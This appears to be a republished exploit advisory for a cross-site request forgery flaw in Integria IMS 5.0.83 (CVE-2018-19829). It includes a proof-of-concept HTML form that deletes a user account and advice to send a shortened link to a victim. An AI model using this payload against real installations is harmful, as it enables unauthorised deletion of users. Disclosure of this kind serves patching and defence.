Integria IMS 5.0.83 - Cross-Site Request Forgery

2018-12-19 18:05:06

# Exploit Title: Integria IMS 5.0.83 - Cross-Site Request Forgery
# Exploit Author: Javier Olmedo
# Website:
# Date: 2018-12-19
# Google Dork: N/A
# Vendor: Artica ST
# Software Link:
# Affected Version: 5.0.83 and possibly before
# Patched Version: 5.0.84
# Category: Web Application
# Platform: Windows & Ubuntu
# Tested on: Win10x64 & Kali Linux
# CVE: 2018-19829
# References:

# 1. Technical Description:
# Integria IMS version 5.0.83 and possibly before are affected by Cross-Site Request Forgery
# vulnerability, an attacker could delete users through GET or POST requests.

# 2.1 Proof Of Concept (Delete User):

(Method 1 - GET)
Use Google URL Shortener (or similar) to shorten the next url
and send it to the victim.

(Method 2 - POST)
Use next form and send it tho the victim.
<script>history.pushState('', '', '/')</script>
<form action="http://[PATH]/index.php">
<input type="hidden" name="sec" value="users" />
<input type="hidden" name="sec2" value="godmode/usuarios/lista_usuarios" />
<input type="hidden" name="borrar_usuario" value="[ID]" />
<input type="submit" value="Delete user" />


No fixes

Per poter inviare un fix è necessario essere utenti registrati.